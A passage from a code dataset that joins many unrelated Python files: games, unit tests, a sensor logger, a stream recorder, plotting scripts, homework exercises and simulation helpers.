event.key == pygame.K_s and smoothy > 0:\r\n smoothy = 0\r\n elif event.key == pygame.K_a and smoothx < 0:\r\n smoothx = 0\r\n elif event.key ==pygame.K_d and smoothx > 0:\r\n smoothx = 0 \r\n \r\n \r\n board.fill(black) #Fills the board with black\r\n for bot in bots:\r\n #For every bot it draws it and runs the pathfinding function to move towards the user\r\n robot.draw_bots(bot)\r\n robot.pathfinding(bot)\r\n #Checks for collisions between bots and bots as well as user and bots\r\n for x in bots:\r\n if bot != x:\r\n collision.bot_collision_detection(bot,x)\r\n collision.user_collision_detection(player,x)\r\n scoreboard += 1 #Adds one to the scoreboard each time\r\n score(scoreboard)\r\n display_lives()\r\n for bot in bots:\r\n if bot.type == 'scrap':\r\n num_scraps += 1\r\n if num_scraps == len(bots):\r\n level += 1\r\n generate_bots()\r\n countdown()\r\n timer += 1\r\n player.draw()\r\n super_charge_bar()\r\n pygame.display.update()\r\n\r\npygame.quit()\r\nquit() \r\n","sub_path":"Source/Yr7Test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"161698707","text":"\"\"\"Module for unit tests for inventory management\"\"\"\n\n# pylint: disable=wrong-import-position\n\nimport unittest\nfrom unittest import TestCase\nfrom unittest.mock import patch\n\nfrom inventory_management.inventory_class import Inventory\nfrom inventory_management.furniture_class import Furniture\nfrom inventory_management.electric_appliances_class import ElectricAppliances\nfrom inventory_management.market_prices import get_latest_price\nimport inventory_management.main as Main\n\n\nclass InventoryTest(TestCase):\n \"\"\"Unit tests for Inventory module\"\"\"\n\n def setUp(self):\n \"\"\"Sets up item\"\"\"\n self.item = Inventory(100, \"Fridge\", 2500, 650)\n\n def test_init(self):\n \"\"\"Test initializes and attributes for Inventory\"\"\"\n self.assertEqual(self.item.product_code, 100)\n self.assertEqual(self.item.description, \"Fridge\")\n self.assertEqual(self.item.market_price, 2500)\n self.assertEqual(self.item.rental_price, 650)\n\n def test_dict(self):\n \"\"\"Test dictionary for Inventory\"\"\"\n inv_dict = Inventory(100, \"Fridge\", 2500, 650).return_as_dictionary()\n self.assertEqual(inv_dict,\n {\"product_code\": 100, \"description\": \"Fridge\",\n \"market_price\": 2500, \"rental_price\": 650})\n\n\nclass FurnitureTest(TestCase):\n \"\"\"Unit tests for Inventory module\"\"\"\n\n def setUp(self):\n \"\"\"Sets up product\"\"\"\n self.product = Furniture(200, \"Chair\", 150, 50, \"Wood\", \"Small\")\n\n def test_init(self):\n \"\"\"Test initializes and attributes for Furniture\"\"\"\n self.assertEqual(self.product.product_code, 200)\n self.assertEqual(self.product.description, \"Chair\")\n self.assertEqual(self.product.market_price, 150)\n self.assertEqual(self.product.rental_price, 50)\n self.assertEqual(self.product.material, \"Wood\")\n self.assertEqual(self.product.size, \"Small\")\n\n def test_return(self):\n \"\"\"Test dictionary for Furniture\"\"\"\n pro_dict = Furniture(200, \"Chair\", 150, 50, \"Wood\",\n \"Small\").return_as_dictionary()\n self.assertEqual(pro_dict,\n {\"product_code\": 200, \"description\": \"Chair\",\n \"market_price\": 150, \"rental_price\": 50,\n \"material\": \"Wood\", \"size\": \"Small\"})\n\n\nclass ElectricAppliancesTest(TestCase):\n \"\"\"Unit tests for Inventory module\"\"\"\n\n def setUp(self):\n \"\"\"Sets up appliance\"\"\"\n self.appliance = ElectricAppliances(300, \"TV\", 4000, 250, \"Sony\", 450)\n\n def test_init(self):\n \"\"\"Test initializes and attributes for Electric Appliances\"\"\"\n self.assertEqual(self.appliance.product_code, 300)\n self.assertEqual(self.appliance.description, \"TV\")\n self.assertEqual(self.appliance.market_price, 4000)\n self.assertEqual(self.appliance.rental_price, 250)\n self.assertEqual(self.appliance.brand, \"Sony\")\n self.assertEqual(self.appliance.voltage, 450)\n\n def test_return(self):\n \"\"\"Test dictionary for Electric Appliances\"\"\"\n app_dict = ElectricAppliances(300, \"TV\", 4000, 250, \"Sony\",\n 450).return_as_dictionary()\n self.assertEqual(app_dict,\n {\"product_code\": 300, \"description\": \"TV\",\n \"market_price\": 4000, \"rental_price\": 250,\n \"brand\": \"Sony\", \"voltage\": 450})\n\n\nclass MarketPricesTest(TestCase):\n \"\"\"Unit tests for Market Prices module\"\"\"\n def test_mark_price(self):\n \"\"\"Test price\"\"\"\n self.assertEqual(get_latest_price(25), 24)\n\n\nclass MainTest(TestCase):\n \"\"\"Unit tests for Main module\"\"\"\n\n def test_main_menu_1(self):\n \"\"\"Test main menu 1\"\"\"\n with patch(\"builtins.input\", side_effect=\"1\"):\n self.assertEqual(Main.main_menu().__name__, \"add_new_item\")\n\n def test_main_menu_2(self):\n \"\"\"Test main menu 2\"\"\"\n with patch(\"builtins.input\", side_effect=\"2\"):\n self.assertEqual(Main.main_menu().__name__, \"item_info\")\n\n def test_main_menu_q(self):\n \"\"\"Test main menu q\"\"\"\n with patch(\"builtins.input\", side_effect=\"q\"):\n self.assertEqual(Main.main_menu().__name__, \"exit_program\")\n\n def test_get_price(self):\n \"\"\"Test get price\"\"\"\n self.assertEqual(Main.get_price(20), 24)\n\n def test_add_new_item(self):\n \"\"\"Test add new item\"\"\"\n Main.FULL_INVENTORY = {}\n new_item = [400, \"Couch\", 25, \"n\", \"n\"]\n inventory = {400: {\"product_code\": 400, \"description\": \"Couch\",\n \"market_price\": 24, \"rental_price\": 25}}\n with patch(\"builtins.input\", side_effect=new_item):\n Main.add_new_item()\n self.assertEqual(Main.FULL_INVENTORY, inventory)\n\n def test_add_new_furniture(self):\n \"\"\"Test add new furniture\"\"\"\n Main.FULL_INVENTORY = {}\n new_furniture = [500, \"Table\", 245, \"y\", \"Metal\", \"Large\"]\n inventory = {500: {\"product_code\": 500, \"description\": \"Table\",\n \"market_price\": 24, \"rental_price\": 245,\n \"material\": \"Metal\", \"size\": \"Large\"}}\n with patch(\"builtins.input\", side_effect=new_furniture):\n Main.add_new_item()\n self.assertEqual(Main.FULL_INVENTORY, inventory)\n\n def test_add_new_electric_appliance(self):\n \"\"\"Test add new electric appliance\"\"\"\n Main.FULL_INVENTORY = {}\n new_appliance = [600, \"Washer\", 50, \"n\", \"y\", \"LG\", 220]\n inventory = {600: {\"product_code\": 600, \"description\": \"Washer\",\n \"market_price\": 24, \"rental_price\": 50,\n \"brand\": \"LG\", \"voltage\": 220}}\n with patch(\"builtins.input\", side_effect=new_appliance):\n Main.add_new_item()\n self.assertEqual(Main.FULL_INVENTORY, inventory)\n\n def test_item_info(self):\n \"\"\"Test item information\"\"\"\n item_dict = {\"product_code\": 3, \"description\": \"PS4\",\n \"market_price\": 24, \"rental_price\": 98}\n expected = (\"product_code: 3\\n\"\n \"description: PS4\\n\"\n \"market_price: 24\\n\"\n \"rental_price: 98\\n\")\n with patch(\"builtins.input\", side_effect=\"3\"):\n Main.FULL_INVENTORY[\"3\"] = item_dict\n self.assertEqual(Main.item_info(), print(expected))\n\n with patch(\"builtins.input\", side_effect=\"4\"):\n Main.FULL_INVENTORY = {}\n expected = \"Item not found in inventory\"\n self.assertEqual(Main.item_info(), print(expected))\n\n def test_exit(self):\n \"\"\"Test exit\"\"\"\n with self.assertRaises(SystemExit):\n Main.exit_program()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"students/ramkumar_rajanbabu/lesson_01/assignment/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332016628","text":"from reportlab.lib.pagesizes import letter\nfrom reportlab.platypus import SimpleDocTemplate, Table, TableStyle\nfrom reportlab.lib import colors\n\n\ndef table_multi_font():\n doc = SimpleDocTemplate(\"table_multi_font.pdf\", pagesize=letter)\n story = []\n data = [\n ['col_{}'.format(x) for x in range(1, 6)],\n [str(x) for x in range(1, 6)],\n ['a', 'b', 'c', 'd', 'e']\n ]\n\n # Jangan gunakan style font dan fontsize terpisah\n tblstyle = TableStyle([('FONT', (0, 0), (-1, 0), 'Times-Roman'),\n ('FONT', (0, 1), (-1, 1), 'Helvetica', 24),\n ('FONT', (0, 2), (-1, 2), 'Courier', 12)])\n\n tbl = Table(data)\n tbl.setStyle(tblstyle)\n\n story.append(tbl)\n doc.build(story)\n\n\nif __name__ == \"__main__\":\n table_multi_font()\n","sub_path":"tables/table_multiple_font.py","file_name":"table_multiple_font.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"609443116","text":"#!/usr/bin/env python\n\nimport argparse\nimport os\nimport glob\nimport sys\n\nimport batchelor\nimport pyRootPwa\n\nfrom Commander import Commander\nfrom Submitter import Submitter\n\nif __name__ == \"__main__\":\n\n\tparser = argparse.ArgumentParser(description=\"submit jobs from list\")\n\tparser.add_argument(\"inputFolder\", type=str, metavar=\"dir\", default=\"/gpfs/work/pr83mo/no72doz2/DATA/3piC/finalfits/bestfits\", help=\"input folder with fit result files\")\n\tparser.add_argument(\"-c\", \"--rpwaConfigFileName\", type=str, metavar=\"rpwaConfigFileName\", default=\"/gpfs/work/pr83mo/no72doz2/DATA/3piC/rootpwa.config\", help=\"config file for RPWA\")\n\tparser.add_argument(\"-b\", \"--batchelorConfigFileName\", type=str, metavar=\"batchelorConfigFileName\", default=\"/home/hpc/pr83mo/no72doz2/workspace/batchelor/charly.config\", help=\"config file for batchlor\")\n\tparser.add_argument(\"-d\", \"--jobOutputDirectory\", type=str, metavar=\"jobOutputDirectory\", default=\"batchelorOut\", help=\"directory to store the jobs' output\")\n\tparser.add_argument(\"-j\", \"--jobName\", type=str, metavar=\"jobName\", dest=\"jobName\", default=\"cov\", help=\"job name to use in submission\")\n\tparser.add_argument(\"-t\", \"--tBin\", type=str, metavar=\"bin\", dest=\"tBin\", default=\"0.1;0.112853\", help=\"tBin semicolon seperated (default: '0.1;0.112853')\")\n\tparser.add_argument(\"-s\", \"--simulate\", action=\"store_true\", help=\"do not actually submit anything\")\n\tparser.add_argument(\"--binIDstart\", type=intensity, metavar=\"#\", default=-1, help=\"binID start (default: all bins)\")\n\tparser.add_argument(\"--binIDend\", type=intensity, metavar=\"#\", default=-1, help=\"binID end (default: all bins)\")\n\tparser.add_argument(\"--binIDstep\", type=intensity, metavar=\"#\", default=1, help=\"binID step\")\n\t\n\targs = parser.parse_args()\n\n\tsubmitter = Submitter(args.batchelorConfigFileName, args.jobOutputDirectory, args.simulate)\n\tsubmissionArgs = []\n\tjobName = args.jobName\n\tparentFolder = os.path.dirname(os.path.realpath(args.rpwaConfigFileName))\n\n\tconfig = pyRootPwa.rootPwaConfig()\n\tif not config.initialize(args.rpwaConfigFileName):\n\t\tpyRootPwa.utils.printErr(\"loading config file '\" + args.configFileName + \"' failed. Aborting...\")\n\t\tsys.exit(1)\n\tpyRootPwa.core.particleDataTable.readFile(config.pdgFileName)\n\tfileManager = pyRootPwa.loadFileManager(config.fileManagerPath)\n\tif not fileManager:\n\t\tpyRootPwa.utils.printErr(\"loading the file manager failed. Aborting...\")\n\t\tsys.exit(1)\n\tbinIDs = fileManager.getBinIDList()\n\tif args.binIDstart != -1 and args.binIDend != -1:\n\t\tbinIDs = range(args.binIDstart, args.binIDend, args.binIDstep)\n\n\tfor binID in binIDs:\n\t\trootpwaDir = os.path.expandvars(\"$ROOTPWA\")\n\t\ttBins = args.tBin.split(\";\")\n\t\tcommander = Commander(rootpwaDir + \"/pyInterface/calcCovMatrixForFitResult.py\")\n\t\tcommander.addArgument(\"-f\", args.inputFolder + \"/\" + str(binID) + \".root\")\n\t\tcommander.addArgument(\"-c\", args.rpwaConfigFileName)\n\t\tcommander.addArgument(\"-b\", str(binID))\n\t\tcommander.addArgument(\"-B\", \"'tPrime;\" + args.tBin + \"'\")\n\t\tcommander.addArgument(\"-g\", parentFolder + \"/ints/\" + str(binID) + \"/integral.generated_\" + tBins[0] + \"_\" + tBins[1] + \".root\")\n\t\tcommander.addArgument(\"-a\", parentFolder + \"/ints/\" + str(binID) + \"/integral.accepted_\" + tBins[0] + \"_\" + tBins[1] + \".root\")\n\t\tcommander.addArgument(\"-w\", parentFolder + \"/wavelists/wavelist\" + str(binID))\n\t\toutputFilePath = args.inputFolder + \"/cov\" + str(binID) + \".root\"\n\t\tcommander.addPosArgument(outputFilePath)\n\t\tjobOut = args.jobOutputDirectory + \"/\" + jobName + \"_\" + str(binID) + \".log\"\n\t\tif not os.path.isfile(outputFilePath):\n\t\t\tsubmissionArgs.append([commander.getCommand(), jobOut, jobName])\n\n\tsubmitter.submitJobs(submissionArgs)\n","sub_path":"scripts/batchelorScripts/calcCovMatrixForRootFilesInFolder.py","file_name":"calcCovMatrixForRootFilesInFolder.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"389365974","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nd = np.int(input(\"What die are you rolling? :\"))\r\nn = np.int(input(\"How many are you rolling? :\"))\r\n\r\nplus = input(\"Are their any added modefiers (y/n)? :\")\r\nif plus == \"y\":\r\n added = np.int(input(\"What is the modefier value? :\"))\r\nelse:\r\n added = 0 \r\n\r\nresistance = input(\"Is the targer vulnerable, resistante or nutural (v/r/n)? :\")\r\nif resistance == \"v\":\r\n multiplier = 2\r\nelif resistance == \"r\":\r\n multiplier = 1/2\r\nelif resistance == \"n\":\r\n multiplier = 1\r\nelse:\r\n multiplier = 1\r\n \r\nsave = input(\"Is there a saving throw (y/n)? :\")\r\nif save == \"y\":\r\n dc = np.int(input(\"What is the dc? :\"))\r\nelse:\r\n dc = 100\r\n\r\niterations = 100000\r\ndamage = []\r\nfor i in range(0,iterations):\r\n indiDamage = multiplier*(np.sum([random.randint(1,d) for i in range(n)])+added)\r\n savethrow = random.randint(1,20)\r\n if savethrow >= dc:\r\n indiDamage = indiDamage/2\r\n damage.append(indiDamage) \r\n\r\nexpected_damage = np.mean(damage)\r\n\r\nprint(expected_damage)\r\nplt.hist(damage)\r\nplt.show()\r\n","sub_path":"Expecteddamage.py","file_name":"Expecteddamage.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"263605064","text":"# P is the amount deposited! ---- bank_p_D\n# R is the stated interest rate! ---- bank_r_I\n# M is the interest compounded per year! ---- bank_m_C\n\n# List\nbank_p_D = [0]*3\nbank_r_I = [0]*3\nbank_m_C = [0]*3\nequation = [0]*3\napy = [0]*3\n\n# This loop will run it again if something goes wrong..\nwhile 1 < 2: \n\n # you can't divide 0 by 0 (It only work when you put zero and Value Errors )\n try:\n # For loop\n for a in range(0, 3):\n print(\"Bank --\", a + 1)\n bank_p_D[a] = float(input(\" Enter the amount deposited: $ \"))\n bank_r_I[a] = float(input(\" Enter the stated interest rate (%):\"))\n bank_m_C[a] = float(input(\" Enter the interest compounded per year: \"))\n\n # For loop\n for b in range(0, 3):\n # Equation = P * ( 1 + r /m )m\n equation[b] = bank_p_D[b] * (1 + bank_r_I[b] / bank_m_C[b]) ** bank_m_C[b]\n\n # APY = ( 1 + r/m )m – 1\n apy[b] = (1 + bank_r_I[b] / bank_m_C[b]) ** bank_m_C[b] - 1\n\n print(\"\\n\")\n\n # This (if/else) will ONLY execute IF the Two Bank's has the same APY!!!\n if apy[0] == apy[1] and apy[2]:\n print(\"NOTE: All 3 back offers same API \")\n elif apy[0] == apy[1]:\n print(\"NOTE: Bank 1 interest rate same as Bank 2, IN this case we will say: They both offers same API \")\n elif apy[0] == apy[2]:\n print(\"NOTE: Bank 1 interest rate same as Bank 3, IN this case we will say: They both offers same API \")\n elif apy[1] == apy[0]:\n print(\"NOTE: Bank 2 interest rate same as Bank 1, IN this case we will say: They both offers same API \")\n elif apy[1] == apy[2]:\n print(\"NOTE: Bank 2 interest rate same as Bank 3, IN this case we will say: They both offers same API \")\n elif apy[2] == apy[0]:\n print(\"NOTE: Bank 3 interest rate same as Bank 1, IN this case we will say: They both offers same API \")\n elif apy[2] == apy[1]:\n print(\"NOTE: Bank 3 interest rate same as Bank 2, IN this case we will say: They both offers same API \")\n else:\n pass\n\n if apy[0] > apy[1] and apy[2]:\n print(\" Bank 1 interest rate is higher then Bank 2 and Bank 3\")\n elif apy[1] > apy[0] and apy[2]:\n print(\" Bank 2 interest rate is higher then Bank 1 and Bank 3\")\n elif apy[2] > apy[0] and apy[1]:\n print(\" Bank 3 interest rate is higher then Bank 1 and Bank 2\")\n else:\n print(\" They are all equal!!!\")\n break # Break the while loop\n\n except ZeroDivisionError: # you Can't divide 0 by 0\n print(\"Cant use 0\",\"\\n\")\n print(\"Try Aging\",\"\\n\")\n except ValueError: # catches the value errors like works EX: a b c\n print(\"Try Aging\", \"\\n\")\n\n \n","sub_path":"Programming 1/Project--5--Decision-Structures/One.py","file_name":"One.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"203305626","text":"#!/usr/bin/python3\nimport Adafruit_DHT\nimport threading\nimport time\nimport json\nimport threading\nimport redis\nimport requests\nfrom datetime import datetime\nimport os\n\n#Carga de simulador para evitar errores\n#from EmulatorGUI import GPIO\nsensor = Adafruit_DHT.DHT22\npin = '4'\ncorreccion_temperatura=0.065\ncorreccion_humedad=0.065\nclass hilo_gpio (threading.Thread):\n\n def __init__(self):\n self.r = redis.StrictRedis(host='localhost', port=6379, db=0, charset='utf-8')\n print(\"************************************************************\")\n print(\"Arranco Hilo consulta fecha y temperatura\")\n print(\"************************************************************\")\n self.arranco()\n\n def arranco(self):\n while True:\n\n humidity, temperature = Adafruit_DHT.read_retry(sensor, pin)\n\n # Note that sometimes you won't get a reading and\n # the results will be null (because Linux can't\n # guarantee the timing of calls to read the sensor).\n # If this happens try again!\n if humidity is not None and temperature is not None:\n print('Temp={0:0.1f}*C Humidity={1:0.1f}%'.format(temperature, humidity))\n else:\n print('Failed to get reading. Try again!')\n datos={}\n if temperature:\n print(\"temperatura origen: \"+'{0:0.1f}'.format(temperature))\n valor_resta=temperature*correccion_temperatura\n temperature=temperature-valor_resta\n print(\"temperatura salida: \" + '{0:0.1f}'.format(temperature))\n datos['temperatura']='{0:0.1f}'.format(temperature)\n if humidity:\n print(\"humedad origen: \" + '{0:0.1f}'.format(humidity))\n valor_resta_h=humidity*correccion_humedad\n humidity=humidity+valor_resta_h\n datos['humedad'] = '{0:0.1f}'.format(humidity)\n print(\"humedad salida: \" + '{0:0.1f}'.format(humidity))\n #datos['fecha']=datetime.now().isoformat()\n datos['fecha']=time.strftime(\"%Y.%m.%d %H:%M:%S\")\n print(datos)\n if temperature is None:\n self.r.lpush(\"dht22-errores\",datetime.now().isoformat()+\": error temperatura\")\n os.system('reboot')\n try:\n dataValues = json.dumps(datos)\n self.r.lpush(\"dht22\",dataValues)\n self.r.set(\"temperaturaActual\", dataValues)\n self.r.publish('dht22', dataValues)\n #cada cinco mins\n time.sleep(10)\n except ValueError:\n print(ValueError)\n\n\nif __name__== \"__main__\":\n\n while True:\n dht22 = hilo_gpio()\n dht22.start()\n dht22.join()\n #print(\"FIN HILO SENDER, ESPERA 10 seg. para Start\")\n time.sleep(10)","sub_path":"src/sensores-reles/getTemp.py","file_name":"getTemp.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"100053483","text":"from mdblog.app import flask_app\r\nfrom mdblog.models import db\r\nfrom mdblog.models import Article\r\n\r\nfrom loremipsum import get_sentences\r\nimport random\r\n\r\nCOUNT = 50\r\n\r\ndef create_article(num):\r\n title = \"Article {:02}\".format(num)\r\n \r\n content = \" \".join(get_sentences(random.randint(3,9), True))\r\n article = Article(title=title, content=content)\r\n return article\r\n \r\nwith flask_app.app_context():\r\n\r\n for num in range(1, COUNT+1):\r\n article = create_article(num)\r\n db.session.add(article)\r\n db.session.commit()\r\n print (\"article #{:02d} created!\".format(num))","sub_path":"fill_db.py","file_name":"fill_db.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"80920880","text":"import argparse\nimport requests\nfrom streamlink import Streamlink\nimport sys\nimport time\nfrom youtube_dl import YoutubeDL\n\ndef get_channels():\n\treturn [\"oFjKZ2S0K4U\", \"A64obrjX0sE\", \"ff0nG6_uhsw\"]\n\ndef record_stream(channel, output_dir):\n\tchannels = get_channels()\n\tchannel_url = \"http://www.youtube.com/watch?v={}\".format(channels[channel - 1])\n\tprint(\"Downloading from\", channel_url)\n\n\tydl = YoutubeDL()\n\tydl.add_default_info_extractors()\n\n\tfilename = \"channel{}-{}.ts\".format(channel, int(time.time()))\n\n\tstreamlink = Streamlink()\n\tstreamlink.set_loglevel(\"debug\")\n\tstreamlink.set_logoutput(output_dir + \"/\" + filename + \".log\")\n\tstreamlink.set_option(\"hls-live-edge\", 9999999)\n\tstreamlink.set_option(\"hls-segment-attempts\", 99)\n\tstreamlink.set_option(\"hls-segment-threads\", 5)\n\tstreamlink.set_option(\"hls-segment-timeout\", 9999)\n\n\tstreams = streamlink.streams(channel_url)\n\tstream = streams[\"best\"]\n\tprint(\"Found stream {}\".format(stream.url))\n\tprint(\"Writing stream to {}\".format(output_dir + \"/\" + filename))\n\twith open(output_dir + \"/\" + filename, 'wb') as out_file, stream.open() as in_stream:\n\t\twhile True:\n\t\t\tdata = in_stream.read(1024)\n\t\t\tif not data:\n\t\t\t\treturn\n\t\t\tout_file.write(data)\n\nparser = argparse.ArgumentParser(description='Record a Lollapalooza channel')\nparser.add_argument('channel')\nparser.add_argument('-o', '--output-dir', default=\"./streams\")\n\nargs = parser.parse_args()\n\nif not args.channel:\n\tprint(\"Supply a channel\")\n\texit()\nchannel = int(args.channel)\n\nif channel < 1 or channel > 3:\n\tprint(\"Channel must be one of 1, 2 and 3\")\n\texit()\n\nwhile True:\n\trecord_stream(channel, args.output_dir)\n","sub_path":"lollapalooza-2019/download-channel.py","file_name":"download-channel.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"350789972","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 14 09:44:13 2021\r\n\r\n@author: wangwy\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport pygal\r\nimport pycountry_convert as pc\r\n\r\ndef country_to_code(country):\r\n try:\r\n return pc.country_name_to_country_alpha2(country).lower()\r\n except:\r\n #print(str(country) + \" is not a country.\")\r\n return\r\n\r\ndef create_chart(year):\r\n df = pd.read_csv(\"export.csv\")\r\n df = df.fillna(0)\r\n display(df)\r\n #df.rename( columns={'Unnamed: 0':'Country'}, inplace=True )\r\n #large = max(df[str(year)])\r\n #print(large)\r\n #df[\"Total\"] = df[\"Total\"].apply(lambda x: 100*x/large)\r\n df[\"COUNTRY NAME\"] = df[\"COUNTRY NAME\"].apply(country_to_code)\r\n df.dropna()\r\n #display(df)\r\n df = df[df[\"YEAR\"] == year]\r\n #display(df)\r\n data = dict(zip(df[\"COUNTRY NAME\"], df[\"VALUE\"]))\r\n #print(data)\r\n worldmap_chart = pygal.maps.world.World()\r\n worldmap_chart.title = 'Agriculture in ' + str(year)\r\n worldmap_chart.add(\"Total\", data)\r\n #worldmap_chart.render_in_browser()\r\n worldmap_chart.render_to_file(\"static/maps/agriculture/\" + str(year)+\".svg\")\r\n return worldmap_chart\r\n \r\nfor i in range(2001, 2017):\r\n create_chart(i)\r\n","sub_path":"heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"120843563","text":"from request import Request\nfrom person import Person\nfrom skill import Skill\n\nfrom names import get_full_name as name\nfrom random import sample, randint, uniform\n\nimport json\nimport sys\n\n\ndef find_best_candidate(people, request, num=1):\n \"\"\"\n Matchs people and requested skills, then returns the top [num] people.\n \"\"\"\n\n # compare request to people skills\n for p in people:\n p.get_score(request)\n\n # sort people by score\n people.sort(reverse=True)\n\n return people[:num]\n\n\ndef generate_data(path, num=25):\n \"\"\"\n Generates random request and [num] people based on json file at [path].\n \"\"\"\n # get list of possible skills\n with open(path) as f:\n json_data = json.load(f)\n\n words = set(json_data[\"words\"])\n\n # create request (similar to the word list from an email)\n request = Request(*sample(words, randint(3, 4)))\n\n # create random people, and a known one with given skills\n people = []\n for _ in range(num):\n sublist = sample(words, randint(3, 6))\n\n person_skills = [Skill(s, uniform(.75, 1.)) for s in sublist]\n\n people.append(Person(name(), person_skills))\n\n return people, request\n\n\ndef static_data():\n \"\"\"\n Returns pre-generated data. Each time the data returned is the same.\n \"\"\"\n\n request = Request(\"fortran\", \"sql\", \"word\", \"github\")\n\n people = [\n Person(\"Raymond Harris\", [\n Skill(\"latex\", 0.76),\n Skill(\"kotlin\", 0.77),\n Skill(\"powerpoint\", 1.00),\n Skill(\"ios\", 0.58),\n Skill(\"linux\", 0.56)\n ]),\n Person(\"Robert Willis\", [\n Skill(\"macos\", 0.99),\n Skill(\"swift\", 0.74),\n Skill(\"vi\", 0.62),\n Skill(\"adobe\", 0.68)\n ]),\n Person(\"Marta Jordon\", [\n Skill(\"swift\", .56),\n Skill(\"data vis.\", 0.72),\n Skill(\"versionning\", 0.84),\n Skill(\"raspberry pi\", 0.93)\n ]),\n Person(\"Genevieve Keaney\", [\n Skill(\"powerpoint\", 0.61),\n Skill(\"github\", 0.84),\n Skill(\"c++\", 0.93)\n ]),\n Person(\"Christopher Sanders\", [\n Skill(\"word\", 0.91),\n Skill(\"c++\", 0.54),\n Skill(\"linux\", 0.52),\n Skill(\"sql\", 0.76),\n Skill(\"big data\", 0.68)\n ])\n ]\n\n return people, request\n\n\nif __name__ == \"__main__\":\n \"\"\"\n execution:\n python src/main.py [-auto] \n \"\"\"\n\n opts = [opt for opt in sys.argv[1:] if opt.startswith(\"-\")]\n\n if \"-auto\" in opts:\n people, request = generate_data('assets/data.json', 5)\n else:\n people, request = static_data()\n\n candidate = find_best_candidate(people, request, 1)\n\n for c in candidate:\n print(c)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"481299624","text":"from turtle import *\nglobal a\na = 60\n\ndef romb ():\n fillcolor(\"red\")\n begin_fill()\n fd(a)\n rt(180+108)\n fd(a)\n rt(180)\n rt(72)\n fd(a)\n rt(180)\n lt(72)\n rt(180)\n fd(a)\n end_fill()\n\ndef platek():\n romb()\n lt(108)\n fd(a)\n lt(36)\n fd(a)\n rt(180-108)\n fd(a)\n rt(180)\n romb()\n rt(180+72+72)\n romb()\n lt(108)\n fd(a)\n rt(180+108)\n fd(a)\n rt(180)\n romb()\n rt(180)\n romb()\n rt(180)\n fd(a)\n rt(180+108)\n fd(a)\n lt(180+108+180)\n romb()\n lt(108)\n rt(72)\n romb()\n\ndef KWIATEK():\n setheading(90)\n for i in range(5):\n setheading(90+72*i+1)\n platek()\n pu()\n setpos(0,0)\n pd()\n\ndef srodek_kwiatka():\n pu()\n setpos(0,0)\n setheading(90)\n for i in range(5):\n pu()\n setpos(0,0)\n pd()\n setheading(90+72*i)\n romb()\nspeed(0)\nKWIATEK()\n","sub_path":"konkursy/03_2004/03_2/kwiatek.py","file_name":"kwiatek.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"91310456","text":"\nimport math\n\nimport numpy as np\nimport scipy.io\n\nimport random\nimport tensorflow as tf \nfrom glob import glob as glb\nimport pylab as pl\n\nimport bouncing_balls as b\n\nfrom tqdm import *\n\nFLAGS = tf.app.flags.FLAGS\n\n# helper function\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\ndef get_converted_frame(cap, shape):\n ret, frame = cap.read()\n frame = cv2.resize(frame, shape, interpolation = cv2.INTER_CUBIC)\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n return frame\n\ndef tryint(s):\n try:\n return int(s)\n except:\n return s\n\ndef alphanum_key(s):\n return [ tryint(c) for c in re.split('([0-9]+)', s) ]\n\ndef load_flow(filename, shape, frame_num):\n # load and reshape\n fluid_state = np.loadtxt(filename)\n fluid_state = fluid_state.reshape(shape[0], shape[1], frame_num)\n return fluid_state\n\ndef load_boundry(filename, shape, frame_num):\n # load and reshape\n ball_location= np.loadtxt(filename)\n b1x = ball_location[0]\n b1y = ball_location[1]\n b2x = ball_location[2]\n b2y = ball_location[3]\n b3x = ball_location[4]\n b3y = ball_location[5]\n b4x = ball_location[6]\n b4y = ball_location[7]\n\n # calc signed distance function.\n boundry = np.zeros((shape[0], shape[1], 2))\n for x in xrange(shape[0]):\n for y in xrange(shape[1]):\n # distance ball 1\n d1 = np.sqrt(np.square(b1x - x) + np.square(b1y - y))\n d2 = np.sqrt(np.square(b2x - x) + np.square(b2y - y))\n d3 = np.sqrt(np.square(b3x - x) + np.square(b3y - y))\n d4 = np.sqrt(np.square(b4x - x) + np.square(b4y - y))\n dw1 = y\n dw2 = shape[1] - y\n min_d = np.min([np.min([d1, d2, d3, d4]) - 10, dw1, dw2])\n #if min_d < 0: # 10 because the balls are size 10\n # min_d = -min_d \n boundry[x,y,0] = min_d\n boundry[x,y,1] = x\n #print(boundry[b1x,b1y])\n #print(boundry[b1x-10,b1y])\n 